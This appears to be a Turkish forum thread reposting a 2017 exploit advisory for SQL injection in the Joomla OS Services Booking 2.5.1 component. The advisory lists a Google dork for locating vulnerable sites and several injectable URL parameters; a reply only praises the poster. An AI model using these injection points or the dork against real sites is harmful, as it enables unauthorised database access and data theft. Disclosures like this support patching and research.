1.                        

Joomla OS Services Booking 2.5.1 Component - SQL Injection Vulnerability

'Web Application Exploits' forumunda KaliBot tarafından 20 Şubat 2017 tarihinde açılan konu

  1. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    509
    Beğeniler:
    23
    Ödül Puanları:
    2
    Web Sitesi:
    Kod:
    # # # # #
    # Exploit Title: Joomla! Component OS Services Booking v2.5.1 - SQL Injection
    # Google Dork: inurl:index.php?option=com_osservicesbooking
    # Date: 18.02.2017
    # Vendor Homepage: https://www.joomdonation.com/
    # Software Buy: https://www.joomdonation.com/joomla-extensions/joomla-services-appointment-booking.html
    # Demo: http://osb.ext4joomla.com/
    # Version: 2.5.1
    # Tested on: Win7 x64, Kali Linux x64
    # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[@]ihsan[.]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/index.php?option=com_osservicesbooking&task=default_showmap&vid=[SQL]
    # http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=[SQL]
    # http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=[SQL]
    # http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=&vid=[SQL]
    # Etc..
    # # # # #
    #  0day.today [2017-02-20]  #
     
  2. Dark Warrior

    Dark Warrior Member

    Katılım:
    10 Eylül 2014
    Mesaj:
    109
    Beğeniler:
    21
    Ödül Puanları:
    18
    Cinsiyet:
    Erkek
    Meslek:
    Bilgi İşlem Sorumlusu
    Şehir:
    Van
    Albayım MaşaAllah Hızınıza Yetişemiyoruz.
     

Bu Sayfayı Paylaş

Share